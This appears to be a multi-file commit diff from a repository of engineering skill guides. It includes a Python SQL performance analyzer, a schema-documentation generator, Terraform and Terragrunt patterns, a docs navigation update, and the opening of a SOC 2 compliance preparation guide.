"""Detect NOT IN (SELECT ...) which is NULL-unsafe."""
if re.search(r'\bNOT\s+IN\s*\(\s*SELECT\b', sql, re.IGNORECASE):
return Issue(
severity="warning",
rule="not-in-subquery",
message="NOT IN with subquery returns no rows if any subquery result is NULL.",
suggestion="Use NOT EXISTS (SELECT 1 ...) instead.",
)
return None
ALL_CHECKS = [
check_select_star,
check_missing_where,
check_cartesian_join,
check_subquery_in_select,
check_missing_limit,
check_function_on_column,
check_leading_wildcard,
check_order_by_rand,
check_union_vs_union_all,
check_not_in_subquery,
]
# ---------------------------------------------------------------------------
# Analysis engine
# ---------------------------------------------------------------------------
def analyze_query(sql: str, dialect: str = "postgres") -> QueryAnalysis:
"""Run all checks against a single SQL query."""
issues: List[Issue] = []
for check_fn in ALL_CHECKS:
issue = check_fn(sql)
if issue:
issues.append(issue)
# Score: start at 100, deduct per severity
score = 100
for issue in issues:
if issue.severity == "critical":
score -= 25
elif issue.severity == "warning":
score -= 10
else:
score -= 5
score = max(0, score)
return QueryAnalysis(query=sql.strip(), issues=issues, score=score)
def split_queries(text: str) -> List[str]:
"""Split SQL text into individual statements."""
queries = []
for stmt in text.split(";"):
stmt = stmt.strip()
if stmt and len(stmt) > 5:
queries.append(stmt + ";")
return queries
# ---------------------------------------------------------------------------
# Output formatting
# ---------------------------------------------------------------------------
SEVERITY_ICONS = {"critical": "[CRITICAL]", "warning": "[WARNING]", "info": "[INFO]"}
def format_text(analyses: List[QueryAnalysis]) -> str:
"""Format analysis results as human-readable text."""
lines = []
for i, analysis in enumerate(analyses, 1):
lines.append(f"{'='*60}")
lines.append(f"Query {i} (Score: {analysis.score}/100)")
lines.append(f" {analysis.query[:120]}{'...' if len(analysis.query) > 120 else ''}")
lines.append("")
if not analysis.issues:
lines.append(" No issues detected.")
for issue in analysis.issues:
icon = SEVERITY_ICONS.get(issue.severity, "")
lines.append(f" {icon} {issue.rule}: {issue.message}")
lines.append(f" -> {issue.suggestion}")
lines.append("")
return "\n".join(lines)
def format_json(analyses: List[QueryAnalysis]) -> str:
"""Format analysis results as JSON."""
return json.dumps(
{"analyses": [a.to_dict() for a in analyses], "total_queries": len(analyses)},
indent=2,
)
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="Analyze SQL queries for common performance issues.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --query "SELECT * FROM users"
%(prog)s --query queries.sql --dialect mysql
%(prog)s --query "DELETE FROM orders" --json
""",
)
parser.add_argument(
"--query", required=True,
help="SQL query string or path to a .sql file",
)
parser.add_argument(
"--dialect", choices=["postgres", "mysql", "sqlite", "sqlserver"],
default="postgres", help="SQL dialect (default: postgres)",
)
parser.add_argument(
"--json", action="store_true", dest="json_output",
help="Output results as JSON",
)
args = parser.parse_args()
# Determine if query is a file path or inline SQL
sql_text = args.query
if os.path.isfile(args.query):
with open(args.query, "r") as f:
sql_text = f.read()
queries = split_queries(sql_text)
if not queries:
# Treat the whole input as a single query
queries = [sql_text.strip()]
analyses = [analyze_query(q, args.dialect) for q in queries]
if args.json_output:
print(format_json(analyses))
else:
print(format_text(analyses))
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,315 @@
#!/usr/bin/env python3
"""
Schema Explorer
Generates schema documentation from database introspection queries.
Outputs the introspection SQL and sample documentation templates
for PostgreSQL, MySQL, SQLite, and SQL Server.
Since this tool runs without a live database connection, it generates:
1. The introspection queries you need to run
2. Documentation templates from the results
3. Sample schema docs for common table patterns
Usage:
python schema_explorer.py --dialect postgres --tables all --format md
python schema_explorer.py --dialect mysql --tables users,orders --format json
python schema_explorer.py --dialect sqlite --tables all --json
"""
import argparse
import json
import sys
import textwrap
from dataclasses import dataclass, asdict
from typing import List, Optional, Dict
# ---------------------------------------------------------------------------
# Introspection query templates per dialect
# ---------------------------------------------------------------------------
INTROSPECTION_QUERIES: Dict[str, Dict[str, str]] = {
"postgres": {
"tables": textwrap.dedent("""\
SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public' AND table_type = 'BASE TABLE'
ORDER BY table_name;"""),
"columns": textwrap.dedent("""\
SELECT table_name, column_name, data_type, character_maximum_length,
is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public' {table_filter}
ORDER BY table_name, ordinal_position;"""),
"primary_keys": textwrap.dedent("""\
SELECT tc.table_name, kcu.column_name
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu
ON tc.constraint_name = kcu.constraint_name
WHERE tc.constraint_type = 'PRIMARY KEY' AND tc.table_schema = 'public'
ORDER BY tc.table_name;"""),
"foreign_keys": textwrap.dedent("""\
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu
ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu
ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY'
ORDER BY tc.table_name;"""),
"indexes": textwrap.dedent("""\
SELECT schemaname, tablename, indexname, indexdef
FROM pg_indexes
WHERE schemaname = 'public'
ORDER BY tablename, indexname;"""),
"table_sizes": textwrap.dedent("""\
SELECT relname AS table_name,
pg_size_pretty(pg_total_relation_size(relid)) AS total_size,
pg_size_pretty(pg_relation_size(relid)) AS data_size,
pg_size_pretty(pg_total_relation_size(relid) - pg_relation_size(relid)) AS index_size
FROM pg_catalog.pg_statio_user_tables
ORDER BY pg_total_relation_size(relid) DESC;"""),
},
"mysql": {
"tables": textwrap.dedent("""\
SELECT table_name
FROM information_schema.tables
WHERE table_schema = DATABASE() AND table_type = 'BASE TABLE'
ORDER BY table_name;"""),
"columns": textwrap.dedent("""\
SELECT table_name, column_name, column_type, is_nullable,
column_default, column_key, extra
FROM information_schema.columns
WHERE table_schema = DATABASE() {table_filter}
ORDER BY table_name, ordinal_position;"""),
"foreign_keys": textwrap.dedent("""\
SELECT table_name, column_name, referenced_table_name, referenced_column_name
FROM information_schema.key_column_usage
WHERE table_schema = DATABASE() AND referenced_table_name IS NOT NULL
ORDER BY table_name;"""),
"indexes": textwrap.dedent("""\
SELECT table_name, index_name, non_unique, column_name, seq_in_index
FROM information_schema.statistics
WHERE table_schema = DATABASE()
ORDER BY table_name, index_name, seq_in_index;"""),
"table_sizes": textwrap.dedent("""\
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;"""),
},
"sqlite": {
"tables": textwrap.dedent("""\
SELECT name FROM sqlite_master
WHERE type = 'table' AND name NOT LIKE 'sqlite_%'
ORDER BY name;"""),
"columns": textwrap.dedent("""\
-- Run for each table:
PRAGMA table_info({table_name});"""),
"foreign_keys": textwrap.dedent("""\
-- Run for each table:
PRAGMA foreign_key_list({table_name});"""),
"indexes": textwrap.dedent("""\
SELECT name, tbl_name, sql FROM sqlite_master
WHERE type = 'index'
ORDER BY tbl_name, name;"""),
"schema_dump": textwrap.dedent("""\
SELECT name, sql FROM sqlite_master
WHERE type = 'table'
ORDER BY name;"""),
},
"sqlserver": {
"tables": textwrap.dedent("""\
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
ORDER BY TABLE_NAME;"""),
"columns": textwrap.dedent("""\
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.precision, c.scale,
c.is_nullable, dc.definition AS default_value
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
LEFT JOIN sys.default_constraints dc ON c.default_object_id = dc.object_id
{table_filter}
ORDER BY t.name, c.column_id;"""),
"foreign_keys": textwrap.dedent("""\
SELECT fk.name AS fk_name,
tp.name AS parent_table, cp.name AS parent_column,
tr.name AS referenced_table, cr.name AS referenced_column
FROM sys.foreign_keys fk
JOIN sys.foreign_key_columns fkc ON fk.object_id = fkc.constraint_object_id
JOIN sys.tables tp ON fkc.parent_object_id = tp.object_id
JOIN sys.columns cp ON fkc.parent_object_id = cp.object_id AND fkc.parent_column_id = cp.column_id
JOIN sys.tables tr ON fkc.referenced_object_id = tr.object_id
JOIN sys.columns cr ON fkc.referenced_object_id = cr.object_id AND fkc.referenced_column_id = cr.column_id
ORDER BY tp.name;"""),
"indexes": textwrap.dedent("""\
SELECT t.name AS table_name, i.name AS index_name,
i.type_desc, i.is_unique, c.name AS column_name,
ic.key_ordinal
FROM sys.indexes i
JOIN sys.index_columns ic ON i.object_id = ic.object_id AND i.index_id = ic.index_id
JOIN sys.columns c ON ic.object_id = c.object_id AND ic.column_id = c.column_id
JOIN sys.tables t ON i.object_id = t.object_id
WHERE i.name IS NOT NULL
ORDER BY t.name, i.name, ic.key_ordinal;"""),
},
}
# ---------------------------------------------------------------------------
# Documentation generators
# ---------------------------------------------------------------------------
SAMPLE_TABLES = {
"users": {
"columns": [
{"name": "id", "type": "SERIAL / INT", "nullable": "NO", "default": "auto", "notes": "Primary key"},
{"name": "email", "type": "VARCHAR(255)", "nullable": "NO", "default": "-", "notes": "Unique, indexed"},
{"name": "name", "type": "VARCHAR(255)", "nullable": "YES", "default": "NULL", "notes": "Display name"},
{"name": "password_hash", "type": "VARCHAR(255)", "nullable": "NO", "default": "-", "notes": "bcrypt hash"},
{"name": "created_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
{"name": "updated_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
],
"indexes": ["PRIMARY KEY (id)", "UNIQUE INDEX (email)"],
"foreign_keys": [],
},
"orders": {
"columns": [
{"name": "id", "type": "SERIAL / INT", "nullable": "NO", "default": "auto", "notes": "Primary key"},
{"name": "user_id", "type": "INTEGER", "nullable": "NO", "default": "-", "notes": "FK -> users.id"},
{"name": "status", "type": "VARCHAR(50)", "nullable": "NO", "default": "'pending'", "notes": "pending/paid/shipped/cancelled"},
{"name": "total", "type": "DECIMAL(19,4)", "nullable": "NO", "default": "0", "notes": "Order total in cents"},
{"name": "created_at", "type": "TIMESTAMP", "nullable": "NO", "default": "NOW()", "notes": ""},
],
"indexes": ["PRIMARY KEY (id)", "INDEX (user_id)", "INDEX (status, created_at)"],
"foreign_keys": ["user_id -> users.id ON DELETE CASCADE"],
},
}
def generate_md(dialect: str, tables: List[str]) -> str:
"""Generate markdown schema documentation."""
lines = [f"# Database Schema Documentation ({dialect.upper()})\n"]
lines.append(f"Generated by sql-database-assistant schema_explorer.\n")
# Introspection queries section
lines.append("## Introspection Queries\n")
lines.append("Run these queries against your database to extract schema information:\n")
queries = INTROSPECTION_QUERIES.get(dialect, {})
for qname, qsql in queries.items():
table_filter = ""
if "all" not in tables:
tlist = ", ".join(f"'{t}'" for t in tables)
table_filter = f"AND table_name IN ({tlist})"
qsql = qsql.replace("{table_filter}", table_filter)
qsql = qsql.replace("{table_name}", tables[0] if tables and tables[0] != "all" else "TABLE_NAME")
lines.append(f"### {qname.replace('_', ' ').title()}\n")
lines.append(f"```sql\n{qsql}\n```\n")
# Sample documentation
lines.append("## Sample Table Documentation\n")
lines.append("Below is an example of the documentation format produced from query results:\n")
show_tables = tables if "all" not in tables else list(SAMPLE_TABLES.keys())
for tname in show_tables:
sample = SAMPLE_TABLES.get(tname)
if not sample:
lines.append(f"### {tname}\n")
lines.append("_No sample data available. Run introspection queries above._\n")
continue
lines.append(f"### {tname}\n")
lines.append("| Column | Type | Nullable | Default | Notes |")
lines.append("|--------|------|----------|---------|-------|")
for col in sample["columns"]:
lines.append(f"| {col['name']} | {col['type']} | {col['nullable']} | {col['default']} | {col['notes']} |")
lines.append("")
if sample["indexes"]:
lines.append("**Indexes:** " + ", ".join(sample["indexes"]))
if sample["foreign_keys"]:
lines.append("**Foreign Keys:** " + ", ".join(sample["foreign_keys"]))
lines.append("")
return "\n".join(lines)
def generate_json_output(dialect: str, tables: List[str]) -> dict:
"""Generate JSON schema documentation."""
queries = INTROSPECTION_QUERIES.get(dialect, {})
processed = {}
for qname, qsql in queries.items():
table_filter = ""
if "all" not in tables:
tlist = ", ".join(f"'{t}'" for t in tables)
table_filter = f"AND table_name IN ({tlist})"
processed[qname] = qsql.replace("{table_filter}", table_filter).replace(
"{table_name}", tables[0] if tables and tables[0] != "all" else "TABLE_NAME"
)
show_tables = tables if "all" not in tables else list(SAMPLE_TABLES.keys())
sample_docs = {}
for tname in show_tables:
sample = SAMPLE_TABLES.get(tname)
if sample:
sample_docs[tname] = sample
return {
"dialect": dialect,
"requested_tables": tables,
"introspection_queries": processed,
"sample_documentation": sample_docs,
"instructions": "Run the introspection queries against your database, then use the results to populate documentation in the sample format shown.",
}
# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(
description="Generate schema documentation from database introspection.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --dialect postgres --tables all --format md
%(prog)s --dialect mysql --tables users,orders --format json
%(prog)s --dialect sqlite --tables all --json
""",
)
parser.add_argument(
"--dialect", required=True, choices=["postgres", "mysql", "sqlite", "sqlserver"],
help="Target database dialect",
)
parser.add_argument(
"--tables", default="all",
help="Comma-separated table names or 'all' (default: all)",
)
parser.add_argument(
"--format", choices=["md", "json"], default="md", dest="fmt",
help="Output format (default: md)",
)
parser.add_argument(
"--json", action="store_true", dest="json_output",
help="Output as JSON (overrides --format)",
)
args = parser.parse_args()
tables = [t.strip() for t in args.tables.split(",")]
if args.json_output or args.fmt == "json":
result = generate_json_output(args.dialect, tables)
print(json.dumps(result, indent=2))
else:
print(generate_md(args.dialect, tables))
if __name__ == "__main__":
main()

View File

@@ -459,6 +459,259 @@ Flag these without being asked:
---
## Multi-Cloud Provider Configuration
When a single root module must provision across AWS, Azure, and GCP simultaneously.
### Provider Aliasing Pattern
```hcl
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 5.0"
}
azurerm = {
source = "hashicorp/azurerm"
version = "~> 3.0"
}
google = {
source = "hashicorp/google"
version = "~> 5.0"
}
}
}
provider "aws" {
region = var.aws_region
}
provider "azurerm" {
features {}
subscription_id = var.azure_subscription_id
}
provider "google" {
project = var.gcp_project_id
region = var.gcp_region
}
```
### Shared Variables Across Providers
```hcl
variable "environment" {
description = "Environment name used across all providers"
type = string
validation {
condition = contains(["dev", "staging", "prod"], var.environment)
error_message = "Must be dev, staging, or prod."
}
}
locals {
common_tags = {
environment = var.environment
managed_by = "terraform"
project = var.project_name
}
}
```
### When to Use Multi-Cloud
- **Yes**: Regulatory requirements mandate data residency across providers, or the org has existing workloads on multiple clouds.
- **No**: "Avoiding vendor lock-in" alone is not sufficient justification. Multi-cloud doubles operational complexity. Prefer single-cloud unless there is a concrete business requirement.
---
## OpenTofu Compatibility
OpenTofu is an open-source fork of Terraform maintained by the Linux Foundation under the MPL 2.0 license.
### Migration from Terraform to OpenTofu
```bash
# 1. Install OpenTofu
brew install opentofu # macOS
snap install --classic tofu # Linux
# 2. Replace the binary — state files are compatible
tofu init # Re-initializes with OpenTofu
tofu plan # Identical plan output
tofu apply # Same apply workflow
```
### License Considerations
| | Terraform (1.6+) | OpenTofu |
|---|---|---|
| **License** | BSL 1.1 (source-available) | MPL 2.0 (open-source) |
| **Commercial use** | Restricted for competing products | Unrestricted |
| **Community governance** | HashiCorp | Linux Foundation |
### Feature Parity
OpenTofu tracks Terraform 1.6.x features. Key additions unique to OpenTofu:
- Client-side state encryption (`tofu init -encryption`)
- Early variable/locals evaluation
- Provider-defined functions
### When to Choose OpenTofu
- You need a fully open-source license for your supply chain.
- You want client-side state encryption without Terraform Cloud.
- Otherwise, either tool works — the HCL syntax and provider ecosystem are identical.
---
## Infracost Integration
Infracost estimates cloud costs from Terraform code before resources are provisioned.
### PR Workflow
```bash
# Show cost breakdown for current code
infracost breakdown --path .
# Compare cost difference between current branch and main
infracost diff --path . --compare-to infracost-base.json
```
### GitHub Actions Cost Comment
```yaml
# .github/workflows/infracost.yml
name: Infracost
on: [pull_request]
jobs:
cost:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: infracost/actions/setup@v3
with:
api-key: ${{ secrets.INFRACOST_API_KEY }}
- run: infracost breakdown --path ./terraform --format json --out-file /tmp/infracost.json
- run: infracost comment github --path /tmp/infracost.json --repo $GITHUB_REPOSITORY --pull-request ${{ github.event.pull_request.number }} --github-token ${{ secrets.GITHUB_TOKEN }} --behavior update
```
### Budget Thresholds and Cost Policy
```yaml
# infracost.yml — policy file
version: 0.1
policies:
- path: "*"
max_monthly_cost: "5000" # Fail PR if estimated cost exceeds $5,000/month
max_cost_increase: "500" # Fail PR if cost increase exceeds $500/month
```
---
## Import Existing Infrastructure
Bring manually-created resources under Terraform management.
### terraform import Workflow
```bash
# 1. Write the resource block first (empty body is fine)
# main.tf:
# resource "aws_s3_bucket" "legacy" {}
# 2. Import the resource into state
terraform import aws_s3_bucket.legacy my-existing-bucket-name
# 3. Run plan to see attribute diff
terraform plan
# 4. Fill in the resource block until plan shows no changes
```
### Bulk Import with Config Generation (Terraform 1.5+)
```bash
# Generate HCL for imported resources
terraform plan -generate-config-out=generated.tf
# Review generated.tf, then move resources into proper files
```
### Common Pitfalls
- **Resource drift after import**: The imported resource may have attributes Terraform does not manage. Run `terraform plan` immediately and resolve every diff.
- **State manipulation**: Use `terraform state mv` to rename or reorganize. Use `terraform state rm` to remove without destroying. Always back up state before manipulation: `terraform state pull > backup.tfstate`.
- **Sensitive defaults**: Imported resources may expose secrets in state. Restrict state access and enable encryption.
---
## Terragrunt Patterns
Terragrunt is a thin wrapper around Terraform that provides DRY configuration for multi-environment setups.
### Root terragrunt.hcl (Shared Config)
```hcl
# terragrunt.hcl (root)
remote_state {
backend = "s3"
generate = {
path = "backend.tf"
if_exists = "overwrite_terragrunt"
}
config = {
bucket = "my-org-terraform-state"
key = "${path_relative_to_include()}/terraform.tfstate"
region = "us-east-1"
encrypt = true
dynamodb_table = "terraform-locks"
}
}
```
### Child terragrunt.hcl (Environment Override)
```hcl
# prod/vpc/terragrunt.hcl
include "root" {
path = find_in_parent_folders()
}
terraform {
source = "../../modules/vpc"
}
inputs = {
environment = "prod"
cidr_block = "10.0.0.0/16"
}
```
### Dependencies Between Modules
```hcl
# prod/eks/terragrunt.hcl
dependency "vpc" {
config_path = "../vpc"
}
inputs = {
vpc_id = dependency.vpc.outputs.vpc_id
subnet_ids = dependency.vpc.outputs.private_subnet_ids
}
```
### When Terragrunt Adds Value
- **Yes**: 3+ environments with identical module structure, shared backend config, or cross-module dependencies.
- **No**: Single environment, small team, or simple directory-based isolation already works. Terragrunt adds a learning curve and another binary to manage.
---
## Installation
### One-liner (any tool)

View File

@@ -122,9 +122,11 @@ nav:
- Overview: skills/engineering-team/index.md
- "A11y Audit": skills/engineering-team/a11y-audit.md
- "AWS Solution Architect": skills/engineering-team/aws-solution-architect.md
- "Azure Cloud Architect": skills/engineering-team/azure-cloud-architect.md
- "Code Reviewer": skills/engineering-team/code-reviewer.md
- "Email Template Builder": skills/engineering-team/email-template-builder.md
- "Incident Commander": skills/engineering-team/incident-commander.md
- "GCP Cloud Architect": skills/engineering-team/gcp-cloud-architect.md
- "Google Workspace CLI": skills/engineering-team/google-workspace-cli.md
- "Microsoft 365 Tenant Manager": skills/engineering-team/ms365-tenant-manager.md
- Playwright Pro:
@@ -158,6 +160,7 @@ nav:
- "Senior QA Engineer": skills/engineering-team/senior-qa.md
- "Senior SecOps Engineer": skills/engineering-team/senior-secops.md
- "Senior Security Engineer": skills/engineering-team/senior-security.md
- "Security Pen Testing": skills/engineering-team/security-pen-testing.md
- "Stripe Integration Expert": skills/engineering-team/stripe-integration-expert.md
- "TDD Guide": skills/engineering-team/tdd-guide.md
- "Tech Stack Evaluator": skills/engineering-team/tech-stack-evaluator.md
@@ -174,6 +177,7 @@ nav:
- "Agent Workflow Designer": skills/engineering/agent-workflow-designer.md
- "API Design Reviewer": skills/engineering/api-design-reviewer.md
- "API Test Suite Builder": skills/engineering/api-test-suite-builder.md
- "Browser Automation": skills/engineering/browser-automation.md
- "Changelog Generator": skills/engineering/changelog-generator.md
- "CI/CD Pipeline Builder": skills/engineering/ci-cd-pipeline-builder.md
- "Codebase Onboarding": skills/engineering/codebase-onboarding.md
@@ -193,8 +197,11 @@ nav:
- "RAG Architect": skills/engineering/rag-architect.md
- "Release Manager": skills/engineering/release-manager.md
- "Runbook Generator": skills/engineering/runbook-generator.md
- "Secrets Vault Manager": skills/engineering/secrets-vault-manager.md
- "Skill Security Auditor": skills/engineering/skill-security-auditor.md
- "Skill Tester": skills/engineering/skill-tester.md
- "Spec-Driven Workflow": skills/engineering/spec-driven-workflow.md
- "SQL Database Assistant": skills/engineering/sql-database-assistant.md
- "Tech Debt Tracker": skills/engineering/tech-debt-tracker.md
- "Terraform Patterns": skills/engineering/terraform-patterns.md
- "Helm Chart Builder": skills/engineering/helm-chart-builder.md
@@ -329,6 +336,7 @@ nav:
- "Quality Manager - ISO 13485": skills/ra-qm-team/quality-manager-qms-iso13485.md
- "Regulatory Affairs Head": skills/ra-qm-team/regulatory-affairs-head.md
- "Risk Management Specialist": skills/ra-qm-team/risk-management-specialist.md
- "SOC 2 Compliance": skills/ra-qm-team/soc2-compliance.md
- Business & Growth:
- Overview: skills/business-growth/index.md
- "Contract & Proposal Writer": skills/business-growth/contract-and-proposal-writer.md

View File

@@ -0,0 +1,417 @@
---
name: "soc2-compliance"
description: "Use when the user asks to prepare for SOC 2 audits, map Trust Service Criteria, build control matrices, collect audit evidence, perform gap analysis, or assess SOC 2 Type I vs Type II readiness."
---
# SOC 2 Compliance
SOC 2 Type I and Type II compliance preparation for SaaS companies. Covers Trust Service Criteria mapping, control matrix generation, evidence collection, gap analysis, and audit readiness assessment.
## Table of Contents
- [Overview](#overview)
- [Trust Service Criteria](#trust-service-criteria)
- [Control Matrix Generation](#control-matrix-generation)
- [Gap Analysis Workflow](#gap-analysis-workflow)
- [Evidence Collection](#evidence-collection)
- [Audit Readiness Checklist](#audit-readiness-checklist)
- [Vendor Management](#vendor-management)
- [Continuous Compliance](#continuous-compliance)
- [Anti-Patterns](#anti-patterns)
- [Tools](#tools)
- [References](#references)
- [Cross-References](#cross-references)
---
## Overview
### What Is SOC 2?
SOC 2 (System and Organization Controls 2) is an auditing framework developed by the AICPA that evaluates how a service organization manages customer data. It applies to any technology company that stores, processes, or transmits customer information — primarily SaaS, cloud infrastructure, and managed service providers.
### Type I vs Type II
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Scope** | Design of controls at a point in time | Design AND operating effectiveness over a period |
| **Duration** | Snapshot (single date) | Observation window (3-12 months, typically 6) |
| **Evidence** | Control descriptions, policies | Control descriptions + operating evidence (logs, tickets, screenshots) |
| **Cost** | $20K-$50K (audit fees) | $30K-$100K+ (audit fees) |
| **Timeline** | 1-2 months (audit phase) | 6-12 months (observation + audit) |
| **Best For** | First-time compliance, rapid market need | Mature organizations, enterprise customers |
### Who Needs SOC 2?
- **SaaS companies** selling to enterprise customers
- **Cloud infrastructure providers** handling customer workloads
- **Data processors** managing PII, PHI, or financial data
- **Managed service providers** with access to client systems
- **Any vendor** whose customers require third-party assurance
### Typical Journey
```
Gap Assessment → Remediation → Type I Audit → Observation Period → Type II Audit → Annual Renewal
(4-8 wk) (8-16 wk) (4-6 wk) (6-12 mo) (4-6 wk) (ongoing)
```
---
## Trust Service Criteria
SOC 2 is organized around five Trust Service Criteria (TSC) categories. **Security** is required for every SOC 2 report; the remaining four are optional and selected based on business need.
### Security (Common Criteria CC1-CC9) — Required
The foundation of every SOC 2 report. Maps to COSO 2013 principles.
| Criteria | Domain | Key Controls |
|----------|--------|-------------|
| **CC1** | Control Environment | Integrity/ethics, board oversight, org structure, competence, accountability |
| **CC2** | Communication & Information | Internal/external communication, information quality |
| **CC3** | Risk Assessment | Risk identification, fraud risk, change impact analysis |
| **CC4** | Monitoring Activities | Ongoing monitoring, deficiency evaluation, corrective actions |
| **CC5** | Control Activities | Policies/procedures, technology controls, deployment through policies |
| **CC6** | Logical & Physical Access | Access provisioning, authentication, encryption, physical restrictions |
| **CC7** | System Operations | Vulnerability management, anomaly detection, incident response |
| **CC8** | Change Management | Change authorization, testing, approval, emergency changes |
| **CC9** | Risk Mitigation | Vendor/business partner risk management |
### Availability (A1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **A1.1** | Capacity management | Infrastructure scaling, resource monitoring, capacity planning |
| **A1.2** | Recovery operations | Backup procedures, disaster recovery, BCP testing |
| **A1.3** | Recovery testing | DR drills, failover testing, RTO/RPO validation |
**Select when:** Customers depend on your uptime; you have SLAs; downtime causes direct business impact.
### Confidentiality (C1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **C1.1** | Identification | Data classification policy, confidential data inventory |
| **C1.2** | Protection | Encryption at rest and in transit, DLP, access restrictions |
| **C1.3** | Disposal | Secure deletion procedures, media sanitization, retention enforcement |
**Select when:** You handle trade secrets, proprietary data, or contractually confidential information.
### Processing Integrity (PI1) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **PI1.1** | Accuracy | Input validation, processing checks, output verification |
| **PI1.2** | Completeness | Transaction monitoring, reconciliation, error handling |
| **PI1.3** | Timeliness | SLA monitoring, processing delay alerts, batch job monitoring |
| **PI1.4** | Authorization | Processing authorization controls, segregation of duties |
**Select when:** Data accuracy is critical (financial processing, healthcare records, analytics platforms).
### Privacy (P1-P8) — Optional
| Criteria | Focus | Key Controls |
|----------|-------|-------------|
| **P1** | Notice | Privacy policy, data collection notice, purpose limitation |
| **P2** | Choice & Consent | Opt-in/opt-out, consent management, preference tracking |
| **P3** | Collection | Minimal collection, lawful basis, purpose specification |
| **P4** | Use, Retention, Disposal | Purpose limitation, retention schedules, secure disposal |
| **P5** | Access | Data subject access requests, correction rights |
| **P6** | Disclosure & Notification | Third-party sharing, breach notification |
| **P7** | Quality | Data accuracy verification, correction mechanisms |
| **P8** | Monitoring & Enforcement | Privacy program monitoring, complaint handling |
**Select when:** You process PII and customers expect privacy assurance (complements GDPR compliance).
---
## Control Matrix Generation
A control matrix maps each TSC criterion to specific controls, owners, evidence, and testing procedures.
### Matrix Structure
| Field | Description |
|-------|-------------|
| **Control ID** | Unique identifier (e.g., SEC-001, AVL-003) |
| **TSC Mapping** | Which criteria the control addresses (e.g., CC6.1, A1.2) |
| **Control Description** | What the control does |
| **Control Type** | Preventive, Detective, or Corrective |
| **Owner** | Responsible person/team |
| **Frequency** | Continuous, Daily, Weekly, Monthly, Quarterly, Annual |
| **Evidence Type** | Screenshot, Log, Policy, Config, Ticket |
| **Testing Procedure** | How the auditor verifies the control |
### Control Naming Convention
```
{CATEGORY}-{NUMBER}
SEC-001 through SEC-NNN → Security
AVL-001 through AVL-NNN → Availability
CON-001 through CON-NNN → Confidentiality
PRI-001 through PRI-NNN → Processing Integrity
PRV-001 through PRV-NNN → Privacy
```
### Workflow
1. Select applicable TSC categories based on business needs
2. Run `control_matrix_builder.py` to generate the baseline matrix
3. Customize controls to match your actual environment
4. Assign owners and evidence requirements
5. Validate coverage — every selected TSC criterion must have at least one control
---
## Gap Analysis Workflow
### Phase 1: Current State Assessment
1. **Document existing controls** — inventory all security policies, procedures, and technical controls
2. **Map to TSC** — align existing controls to Trust Service Criteria
3. **Collect evidence samples** — gather proof that controls exist and operate
4. **Interview control owners** — verify understanding and execution
### Phase 2: Gap Identification
Run `gap_analyzer.py` against your current controls to identify:
- **Missing controls** — TSC criteria with no corresponding control
- **Partially implemented** — Control exists but lacks evidence or consistency
- **Design gaps** — Control designed but does not adequately address the criteria
- **Operating gaps** (Type II only) — Control designed correctly but not operating effectively
### Phase 3: Remediation Planning
For each gap, define:
| Field | Description |
|-------|-------------|
| Gap ID | Reference identifier |
| TSC Criteria | Affected criteria |
| Gap Description | What is missing or insufficient |
| Remediation Action | Specific steps to close the gap |
| Owner | Person responsible for remediation |
| Priority | Critical / High / Medium / Low |
| Target Date | Completion deadline |
| Dependencies | Other gaps or projects that must complete first |
### Phase 4: Timeline Planning
| Priority | Target Remediation |
|----------|--------------------|
| Critical | 2-4 weeks |
| High | 4-8 weeks |
| Medium | 8-12 weeks |
| Low | 12-16 weeks |
---
## Evidence Collection
### Evidence Types by Control Category
| Control Area | Primary Evidence | Secondary Evidence |
|--------------|-----------------|-------------------|
| Access Management | User access reviews, provisioning tickets | Role matrix, access logs |
| Change Management | Change tickets, approval records | Deployment logs, test results |
| Incident Response | Incident tickets, postmortems | Runbooks, escalation records |
| Vulnerability Management | Scan reports, patch records | Remediation timelines |
| Encryption | Configuration screenshots, certificate inventory | Key rotation logs |
| Backup & Recovery | Backup logs, DR test results | Recovery time measurements |
| Monitoring | Alert configurations, dashboard screenshots | On-call schedules, escalation records |
| Policy Management | Signed policies, version history | Training completion records |
| Vendor Management | Vendor assessments, SOC 2 reports | Contract reviews, risk registers |
### Automation Opportunities
| Area | Automation Approach |
|------|-------------------|
| Access reviews | Integrate IAM with ticketing (automatic quarterly review triggers) |
| Configuration evidence | Infrastructure-as-code snapshots, compliance-as-code tools |
| Vulnerability scans | Scheduled scanning with auto-generated reports |
| Change management | Git-based audit trail (commits, PRs, approvals) |
| Uptime monitoring | Automated SLA dashboards with historical data |
| Backup verification | Automated restore tests with success/failure logging |
### Continuous Monitoring
Move from point-in-time evidence collection to continuous compliance:
1. **Automated evidence gathering** — scripts that pull evidence on schedule
